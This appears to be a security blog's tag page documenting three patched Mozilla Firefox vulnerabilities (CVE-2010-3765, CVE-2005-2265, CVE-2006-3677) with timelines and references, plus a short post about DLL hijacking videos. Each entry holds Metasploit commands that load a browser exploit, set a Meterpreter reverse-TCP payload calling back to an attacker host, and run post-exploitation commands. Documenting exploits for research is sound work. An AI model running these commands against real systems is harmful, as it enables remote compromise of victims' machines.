Tag Archives: Firefox

CVE-2010-3765 : Mozilla Firefox Interleaving document.write and appendChild Exploit

Timeline :

Vulnerability discovered in the wild
Vulnerability corrected by the vendor on 2010-10-27
Vulnerability & Exploit-DB PoC disclosed by unknown on 2010-10-29
Metasploit PoC released on 2011-02-17

PoC provided by :

unknown
scriptjunkie

Reference(s) :

CVE-2010-3765
MFSA 2010-73
EDB-ID-15352
OSVDB-ID-68905

Affected version(s) :

All Firefox 3.6.x versions prior to 3.6.12
All Firefox 3.5.x versions prior to 3.5.15
All Thunderbird 3.1.x versions prior to 3.1.6
All Thunderbird 3.0.x versions prior to 3.0.10
All SeaMonkey 2.0.x versions prior to 2.0.10

Tested on Windows XP SP3 with :

Firefox 3.6.9 released on 2010-09-23

Description :

This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. This exploit is a Metasploit port of the in-the-wild exploit.

Commands :

use exploit/windows/browser/mozilla_interleaved_write
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

CVE-2005-2265 : Mozilla Suite/Firefox InstallVersion compareTo() Code Execution

Timeline :

Vulnerability reported to the vendor by Aviv Raff on 2005-05-28
Version 1.0.5 of Mozilla Firefox & 1.7.10 of Mozilla Suite released on 2005-07-12
Vulnerability & PoC disclosure by Aviv Raff on 2005-07-13

PoC provided by :

hdm
Aviv Raff

Reference(s) :

CVE-2005-2265
MFSA 2005-50

Affected version(s) :

Mozilla Firefox versions prior to 1.0.5
Mozilla Suite versions prior to 1.7.10

Tested on Windows XP SP3 with :

Mozilla Firefox 1.0.4

Description :

This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit module is a direct port of Aviv Raff’s HTML PoC.

Commands :

use exploit/multi/browser/mozilla_compareto
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2006-3677 : Mozilla Suite/Firefox Navigator Object Code Execution

Timeline :

Vulnerability reported to ZDI by Anonymous
Vulnerability reported to the vendor by ZDI on 2006-06-16
Coordinated vulnerability disclosure on 2006-07-26
PoC provided by hdm on 2006-07-27
Metasploit PoC provided on 2006-07-30

PoC provided by :

hdm

Reference(s) :

CVE-2006-3677
MFSA 2006-45
ZDI-06-025

Affected version(s) :

Firefox versions prior to 1.5.0.5

Tested on Windows XP SP3 with :

Firefox 1.5.0.4

Description :

This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit requires the Java plugin to be installed.

Commands :

use exploit/multi/browser/mozilla_navigatorjava
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

Some videos of DLL Hijacking exploitation with Metasploit

Didn’t have time in August (holidays) to write a complete blog post on the DLL Hijacking thing, so I only made some YouTube videos, which explain the danger of this flaw better. But what is interesting in this story is the “Acros” position on the coordinated disclosure process proposed by HD Moore, and the collision between security researchers working on the same vulnerability without knowing that they were working on the same thing, thousands of miles away from each other.

[youtube DjewBjJR0HA]

[youtube gtLTUZvOYc0]

[youtube EeztydiJTeU]

[youtube O_bX0I9hF1s]